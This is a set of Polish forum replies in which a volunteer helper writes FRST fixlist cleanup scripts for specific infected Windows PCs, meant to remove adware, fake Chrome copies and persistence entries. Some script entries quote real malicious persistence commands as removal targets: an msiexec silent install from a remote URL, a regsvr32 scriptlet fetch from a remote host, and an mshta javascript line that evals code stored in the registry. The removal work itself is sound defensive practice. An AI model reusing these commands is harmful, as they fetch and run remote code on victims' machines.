Miszel03

Zrób nowy zestaw raportów FRST oraz GMER.

Przepraszam, nie zwróciłem uwagi na instalację Wise Registry Cleaner. Gdyby zwrócił prosiłbym tylko o skan bym mógł zweryfikować wyniki. W panelu sterowania w sekcji Programy spróbuj wybrać opcję naprawczą po zaznaczeniu tego programu, gdyby to jednak było niemożliwe to zainstalujesz program od nowa ze strony producenta. Jeśli zaś chodzi o resztę to wszystko pomyślnie wykonana, - system uprzątnięty, infekcja usunięta. Komunikat nie ma prawa już wystąpić. Czekam na odzew dot. stanu problemu na wszelki wypadek, a potem przechodzę do finalizacji tematu.

System jest zainfekowany, ale to jest właśnie skutek pobierania nielegalnych danych z internetu. Skan MBAM musimy powtórzyć ponieważ nie dostarczyłeś z niego żadnego raportu. Częściowo zniknął Ci skróty przeglądarek, więc będziesz je sobie musiał utworzyć na nowo. To jedyny sposób na ich wyleczenie. Do poczytania: KLIK. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM-x32\...\Run: [WindowsDefender] => - HKU\S-1-5-21-4259783707-2282555008-1561178269-1001\...\Run: [Windows Defender] => - HKU\S-1-5-21-4259783707-2282555008-1561178269-1001\...\Run: [24720187] => C:\Users\jjcie\AppData\Roaming\9681920\348687.exe [7680 2017-04-17] () C:\Users\jjcie\AppData\Roaming\9681920 SearchScopes: HKU\S-1-5-21-4259783707-2282555008-1561178269-1001 -> DefaultScope {1210BEB2-3F7D-4599-BF56-C02995A24DF1} URL = SearchScopes: HKU\S-1-5-21-4259783707-2282555008-1561178269-1001 -> {1210BEB2-3F7D-4599-BF56-C02995A24DF1} URL = R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] U3 pwndruow; C:\Users\jjcie\AppData\Local\Temp\pwndruow.sys [56584 2017-04-17] (GMER) [brak podpisu cyfrowego] 2017-04-17 19:22 - 2017-04-17 19:27 - 00000000 ____D C:\Program Files\CXXR1W6YIS 2017-04-17 19:21 - 2017-04-17 19:27 - 00000000 ____D C:\Program Files\8W2F84HQWS 2017-04-17 19:21 - 2017-04-17 19:27 - 00000000 ____D C:\Program Files\5D1JG165FV 2017-04-17 19:21 - 2017-04-17 19:27 - 00000000 ____D C:\Program Files\04HTVGVO2N 2017-04-17 19:19 - 2017-04-17 19:27 - 00000000 ____D C:\Program Files\PAVYOOGSJ2 2017-04-17 19:19 - 2017-04-17 19:27 - 00000000 ____D C:\Program Files\D168NDOL55 2017-04-17 19:19 - 2017-04-17 19:27 - 00000000 ____D C:\Program Files\47JXY2S01L 2017-04-17 19:19 - 2017-04-17 19:27 - 00000000 ____D C:\Program Files\1VZ46GB9KX C:\Users\jjcie\Desktop\Wоrld оf Tanks.lnk C:\Users\jjcie\Desktop\ЕVE Lаuncher.lnk C:\Users\jjcie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\World of Tanks\Wоrld of Tаnks.lnk C:\Users\jjcie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\EVE Launcher\ЕVE Launсhеr.lnk C:\Users\jjcie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CodeBlocks\СоdeBlоcks (Lаunchеr).lnk C:\Users\jjcie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnet Ехplоrer.lnk C:\Users\jjcie\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Мozilla Firefoх.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Мozilla Firefох.lnk C:\Users\Public\Desktop\Арlikacjа Вlizzard.lnk C:\Users\Public\Desktop\Мinecrаft.lnk C:\Users\Public\Desktop\Нeаrthstonе.lnk CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\jjcie\AppData\Local CMD: dir /a C:\Users\jjcie\AppData\LocalLow CMD: dir /a C:\Users\jjcie\AppData\Roaming EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt.

Tematu nie przenoszę do działu infekcji, bo to nie w niej leży problem. Raporty nie wykazują oznak infekcji.

To sprawka wpisu w Harmonogramie Zadań. Tak i zastosowanie Fix'a na innym systemie niż, dla którego został napisany grozi jego uszkodzeniem. W systemie jest wstawiony klucz na powłoce Shell oraz w Harmonogramie Zadań, który uruchamia tą stronę. Oprócz tego kasuję resztki po programach, sprzątam w systemie. Są to wpisy infekcyjne. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj88NkZWNkY3FjH5MdzLMkVYFjY8MdU5OWlYRYZQNYRLMq== /q HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 Toolbar: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File S3 dbx; system32\DRIVERS\dbx.sys [X] Task: {671CE90D-BF79-4C3E-A1DE-A8F5F0ABC436} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj88NkZWNkY3FjH5MdzLMkVYFjY8MdU5OWlYRYZQNYRLMq== scrobj.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OSGeo4W\OSGeo4W Shell.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zresetuj synchronizację w przeglądarce Mozilla FireFox - KLIK (nie wiem czy te wpisy, niczego tam nie wstawiły - jak jest to dla Ciebie kolizyjne resetować synchronizację to możesz pominąć). 3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 4. Zrób nowy log FRST z opcji Skanuj (Scan) (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

OK.

Te raporty o SpyShelter nie powinny budzić obaw, to normalne i odniosę się tutaj do postu Ichitio. Niemniej jednak proszę o przygotowanie zestawu raportów FRST bez data, poprawnie, - zgodnie z zasadami działu.

Coś igra z powłoką i stworzyło zaplanowany start niedomyślnych części interfejsu: HKU\S-1-5-21-742180472-97996321-980396719-1000\...\Winlogon: [shell] C:\Windows\expstart.exe [925184 2017-03-14] () FRST flaguje to jako szkodliwe, nie jestem do tego przekonany w 100% procentach, ale uziemimy to, najwyżej zrobimy rekonstrukcję. Druga sprawa to problem z resztkami adware w przeglądarce Google Chrome oraz szczątkami po programach w systemie. Stan dysku jest dobry, reszty rzeczy nie jestem w stanie zweryfikować, więc przechodzimy do działań. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-742180472-97996321-980396719-1000\...\Winlogon: [shell] C:\Windows\expstart.exe [925184 2017-03-14] () CHR HomePage: Default -> hxxp://www.oursurfing.com/?type=sy&ts=1438889212&z=e6aafd8575a488aa0b5390cg5z3c8b2bdb1t3o5g8o&from=smt&uid=ST3250310AS_6RY5VJ81XXXX6RY5VJ81 S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 HWiNFO32; \??\C:\Users\Nerfi\AppData\Local\Temp\HWiNFO64A.SYS [X] S3 VBAudioVACMME; system32\DRIVERS\vbaudio_cable64_win7.sys [X] AlternateDataStreams: C:\ProgramData\TEMP:BC359956 [126] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarClient\GameStars.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rockstar Games\GTA San Andreas\Zagraj w GTA San Andreas.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Network Status.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\PokerStars.eu.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Uninstall PokerStars.eu.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Metin2 Nawie\Metin2 Nawie.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GTA San Andreas Patch v1.0\gta_sa.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Axialis Software\Axialis IconWorkshop Help.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Axialis Software\Axialis IconWorkshop.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Axialis Software\Uninstall or repair Axialis IconWorkshop.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ostatni punkt powtórz również na przeglądarce Mozilla FireFox. 3. Zastosuj AdwCleaner najpierw z opcji Szukaj, a następnie z opcji Oczyść. Dostarcz raport z tego działania. 4. Przeskanuj system jeszcze raz programem Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST* z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. * - użyj najnowszej wersji programu (KLIK), bo została wydane aktualizacja.

W raportach brak oznak infekcji i szczątek po niej, ale uprzedzam, że raczej raz zajmuję się tak olewatorsko zrobionym tematem. Podstawą do otrzymania tutaj pomocy jest stosowanie się do zasad działu.

Ja poproszę o dostarczenie kompletnego zestawu raportów FRST, czyli plik FRST, Addition oraz Shortcut*. Dołącz również raport GMER. * bez niego diagnostyka jest nie pełna, więc tamtych raportów nie biorę pod uwagę. Jeśli to możliwe to poproszę również o raporty z wykonania skryptu (plik Fixlog.txt). Przeszukaj rejestr, bo chcę widzieć całe to ustrojstwo w systemie (układ plików wezmę z bazy). Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). ucbrowser Obok powstanie raport SearchReg.txt - zaprezentuj go na forum.

Wszystko pomyślnie wykonane, moglibyśmy już kończyć, lecz program (tj. mówiłem) UCBrowser zaczyna się bronić i dochodzi do reinstalacji. 1. Wejdź do trybu awaryjnego (kliknij klawisz F8 przed startem systemu). Z tego poziomu systemu masz wykonać poniższe zadania oprócz pkt. 4. 2. Wszystkie zagrożenia wykryte przez AdwCleaner daj do kasacji (używając opcji Oczyść). 3. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: R1 ucdrv; C:\WINDOWS\System32\drivers:ucdrv-x64.sys [25444 ] (UC Web Inc.) AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [25444] AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [1498914] AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1223458] Task: {A232A8CC-7144-40CD-A7B9-5AEAD06BD34B} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-03-11] (UC Web Inc.) RemoveDirectory: C:\Program Files (x86)\UCBrowser C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FIFA 15\FIFA 15使用者授權協議.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FIFA 15\技術支援.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut). Dołącz też plik fixlog.txt.

Wesołych Świąt!

Skontaktuj się z dostawcą internetu. Spróbuj również ustawić DNS Google - KLIK. To są 8.8.8.8 i 8.8.8.4. Być może to przyśpieszy ładowanie się stron. Komentując zaś resztę to z punktu widzenia tego działu (zwalczenie infekcji) wszystko jest w porządku. Temat przenoszę do działu Sieci. Wykonaj finalizację, czyli zastosuj DelFix (kasacja używanych narzędzi) oraz skasuj punkty przywracania systemu - KLIK. Sprawdź również czy masz aktualnego Windowsa i inne oprogramowanie - KLIK / KLIK. To będzie dobre połączenie. Kaspersky ma jedną z najlepszych wykrywalności konkretnego złośliwego oprogramowania, natomiast MBAM świetnie wykrywa pozostałe infekcji czyli adware / PUP. Czy będą się gryź? Nie sądzę. Obserwuj.

System jest zainfekowany przez nowoczesne adware podstawiające fałszywą kopię przeglądarkę Google Chrome. Do tego dochodzą dwie infekcje Win32/Miuref (KLIK) oraz inna, niezidentyfikowana zakneblowana w rejestrze. Przypuszczalnie jest uszkodzona usługa winmgmt. 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [] 1 HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\Run: [ibsoft] => regsvr32.exe C:\Users\rober\AppData\Local\Ibsoft\bassTrust.dll ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => -> Brak pliku SearchScopes: HKU\S-1-5-21-3797074174-2719608703-2427757124-1057 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Tooltony\Application\chrome.exe RemoveDirectory: C:\Program Files (x86)\Tooltony S3 dbx; system32\DRIVERS\dbx.sys [X] HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\StartupApproved\Run: => "YSPack" HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\Software\Classes\929e3: "C:\WINDOWS\system32\mshta.exe" "javascript:obxi5j9TR="QqmpimHi";dr6=new ActiveXObject("WScript.Shell");xvaC4eb2="I";Yng82J=dr6.RegRead("HKCU\\software\\aurgjr\\aclehngaac");Z4ob1mPdd="34b";eval(Yng82J);tHKOs1T="pxl0QBT";" C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cygwin\Cygwin64 Terminal.lnk C:\Users\rober\AppData\Roaming\Microsoft\Excel\Kopia_Kopia_Lista_termin_0_oceny_koncowe305858052441186973\Kopia_Kopia_Lista_termin_0_oceny_koncowe.xls.lnk C:\Users\rober\AppData\Roaming\Microsoft\Excel\KALKULATOR%20DOCHODU305849803376288589\KALKULATOR%20DOCHODU.xls.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\rober\AppData\Local\Mozilla C:\Users\rober\AppData\Roaming\Mozilla C:\Users\rober\AppData\Roaming\Profiles C:\Program Files (x86)\Mozilla Firefox C:\ProgramData\Mozilla Reg: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt /s FindFolder: *Tooltony*;*Ibsoft* EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin 3. Zastosuj AdwCleaner z opcji najpierw Szukaj, a następnie z opcji Oczyść. Dostarcz raport z tego działania. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). tooltony Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób raport z narzędzia Farbar Service Scanner (FSS) i zaprezentuj go na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan) już bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Końcowe poprawki, skan i będziemy powoli kończyć. P.S: Znikną Ci niektóre skróty od przeglądarek - zrobisz sobie nowe. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Moncar DeleteKey: HKEY_USERS\S-1-5-21-3585312160-345975134-3153727662-1001\Software\Moncar U0 Partizan; system32\drivers\Partizan.sys [X] 2017-04-06 18:05 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\ISAFEKRNLBOOT.del 2017-04-06 18:05 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\ISAFENETFILTER.del 2017-03-23 23:14 - 2017-03-23 23:35 - 00000000 ____D C:\Users\Tom\AppData\Roaming\Qevighdrekaght 2017-03-23 23:16 - 2017-04-07 22:54 - 00000000 ____D C:\Users\Tom\AppData\Local\UCBROWSER.del 2017-03-24 19:40 - 2017-04-06 21:17 - 00000000 ____D C:\Program Files\14yaqw65 2017-04-06 18:06 - 2017-04-06 18:06 - 00000000 ____D C:\Users\Tom\AppData\Local\Moncar C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Tom\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\48499db33039e897\Tomasz - Chrome.lnk C:\Users\Tom\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Jeśli MBAM coś wykryje to poproszę nowy zestaw raportów FRST. Dostarcz bez względu na wszystko plik Fixlog.

Czy mógłbyś dostarczyć raport z tych dwóch działań? Faktycznie, nie wszystko zostało wyczyszczona. Nadal jest aktywna infekcja WMI oraz szczątki adware. Na temat asystentów pobierania poczytaj - KLIK. Tą instalke z nim kasuję. C:\Users\PostraCH\Downloads\IObit-Unlocker-26902-AsystentPobierania.exe 1. Czy kojarzysz taki program jak ICalc - instalowałeś go celowo? Jeśli nie to spróbuj ją odinstalować. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {D249828A-1484-4492-AC79-D307072B948A} - System32\Tasks\osTip => Chrome.exe WMI_ActiveScriptEventConsumer_ASEC: ShortcutWithArgument: C:\Users\PostraCH\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\PostraCH\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\PostraCH\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> D:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://qtipr.com/ RemoveDirectory: C:\ProgramData\WindowsMsg HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 SearchScopes: HKU\S-1-5-21-3865952795-1007310133-35833665-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO-x32: Brak nazwy -> {FB4F6285-4C32-49F2-950F-A5998F9CEC6C} -> Brak pliku S1 ucdrv; \??\C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [X] 2017-04-11 13:40 - 2017-04-11 13:40 - 01204256 _____ ( ) C:\Users\PostraCH\Downloads\IObit-Unlocker-26902-AsystentPobierania.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\Star Wars - The Old Republic.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\SWTOR Customer Support.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\Uninstall Star Wars - The Old Republic.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\View License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\View Readme.lnk C:\Users\PostraCH\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UC浏览器\卸载UC浏览器.lnk RemoveDirectory: C:\Program Files (x86)\UCBrowser C:\Users\PostraCH\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Star Wars - The Old Republic.lnk C:\Users\Public\Desktop\Star Wars - The Old Republic.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut). Dołącz też plik fixlog.txt.

Przecież rozmawiałem z Tobą o oprogramowaniu protekcyjnym. Nic Cię nie uchroni lepiej przez infekcjami szyfrującymi niż systematyczne kopie zapasowych danych. Infekcja daję o sobie jawne znaki, więc nie ma siły, żebyś podłączył dysk lub zalogował się do chmury podczas infekcji... Temat przenoszę do działu Windows 10. Raporty nie wykazują oznak infekcji. Niemniej jednak mam pewne podejrzenia co do systemu i proszę o weryfikacje systemu poprzez narzędzie SFC. 1. Start narzędzia komend. Kliknij jednocześnie klawisz oraz R. Uruchomi się narzędzie Uruchamianie. W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER. Uruchomi się okno konsoli komend. 2. Rozpoczęcie skanowania. W oknie konsoli komend wklej poniższą komendę. sfc /scannow Rozpocznie się skanowanie systemu i weryfikacja zgodności plików. Podczas niego nie nie rób, po prostu czkeja. 3. Zakończenie skanowania i raport. Kiedy skanowanie się zakończy (wyświetli Ci się informacja) przeczytaj czy zostały wykryte jakieś błędy, jeśli nie to napisz to. Jeśli nie patrz dalej. Dostarcz raport z błędami, w oknie konsoli zastosuj poniższa komendę. findstr /c:"[sR]" %windir%\Logs\CBS\CBS.log >"%userprofile%\Desktop\sfc.txt" Na pulpicie postanie plik SFC.TXT - zaprezentuj go na forum.

Proszę przeczytać post o nieaktualności raportów w temacie zgłaszania tematów bez odpowiedzi. Kiedy otrzymam aktualne raporty przejdę do pracy.

Dokładna data napisania tego tematu. Dokładna data generacji raportów do tego tematu. Dokłada data napisania posta przypominającego o temacie. A ja przecież kilka postów wyżej napisałem: Bo otrzymuję aktualne raporty, za wsparcie bardzo dziękujemy. Co jak co, ale na naszym forum świadczymy najlepszą (picasso jest wyróżniona przez Microsoft, a ja jestem jej "uczniem"), darmową pomoc w usuwaniu malware. Naprawdę nie mam ochoty dopraszać się o raporty. To, że temat wcześniej został przeoczony to fakt, moja wina (i najmocniej za to przepraszam!), ale gdybyś dostarczył nowe raporty pomoc otrzymałbyś natychmiast po zgłoszeniu. Wolę pomóc większej ilości tematów niż prosić jedną osobę o raporty i załatwić więcej tematów tym kosztem. Niemniej jednak proszę o nowy zestaw raportów FRST oraz GMER. Temat wrzucam na priorytet. Pozdrawiam.

A gdzie plik Fixlog? Wszystko pomyślnie wykonane. Wcześniej jednak zapomniałem dokleić instrukcji do kasacji fałszywej przeglądarki (tworzę je osobno), więc wykonaj je teraz. 1. Wszystkie zagrożenia wykryte przez AdwCleaner daj do kasacji (używając opcji Oczyść). Następnie powtórz skan, jeśli coś zostanie wykryte to również skasuj wytypowane wyniki. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491404369&z=186fe2ae8afeb2f31b70ea7gfz1t9gazee4zbc3q6w&from=che0812&uid=M4-CT128M4SSD2_00000000115003259954 C:\Users\Tom\AppData\Local\Google\Chrome\User Data\ChromeDefaultData KU\S-1-5-21-3585312160-345975134-3153727662-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Moncar\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Moncar C:\Users\Tom\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\abcc729f78f1532b\Tomasz - Chrome.lnk C:\Users\Tom\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Ewa - Chrome.lnk C:\Users\Tom\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\225bb61db2f318c1\Tomasz - Chrome.lnk FirewallRules: [{4C4FB2F8-393A-4F10-BE3C-BC090EDA8AFA}] => (Allow) C:\Program Files (x86)\Moncar\Application\chrome.exe FirewallRules: [{1B4A268F-23CF-4AB9-910F-059F2AB33131}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{170D7E3D-731D-48ED-918D-F5416C38E394}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw 